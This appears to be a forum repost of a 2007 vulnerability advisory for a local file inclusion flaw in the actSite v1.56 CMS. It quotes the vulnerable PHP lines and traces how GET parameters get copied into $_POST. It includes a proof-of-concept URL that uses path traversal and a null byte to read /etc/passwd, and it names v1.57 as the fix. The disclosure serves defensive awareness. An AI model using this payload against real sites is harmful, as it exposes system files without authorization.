[yashin]

Kod:

\#'#/                          (-.-)    -----------------oOO---(_)---OOo-----------------    | actSite v1.56 (news.php) Local File Inclusion |    |                 coded by DNX                  |    ------------------------------------------------- [!] Discovered: DNX [!] Vendor: http://www.actsite.de [!] Detected: 02.09.2007 [!] Reported: 02.09.2007 [!] Remote: yes [!] Background: actSite is a content management system based on PHP and MySQL [!] Bug: in phpinc/news.php line 101          require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php"; [!] PoC:     - http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00 [!] Description:     - So why we can inject code in a post variable per url? Let's do some research...       - In phpinc/news.php line 36           require_once('../config.php');       - Let's take a look in 'config.php' line 22         if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");       - Ok, let's take a look in 'phpinc/inc/csb.php' line 18         if(getenv('REQUEST_METHOD') == "GET") {         foreach($_GET as $key => $val) {             $_POST[$key] =& $_GET[$key];         }     } [!] Solution: Install security update to v1.57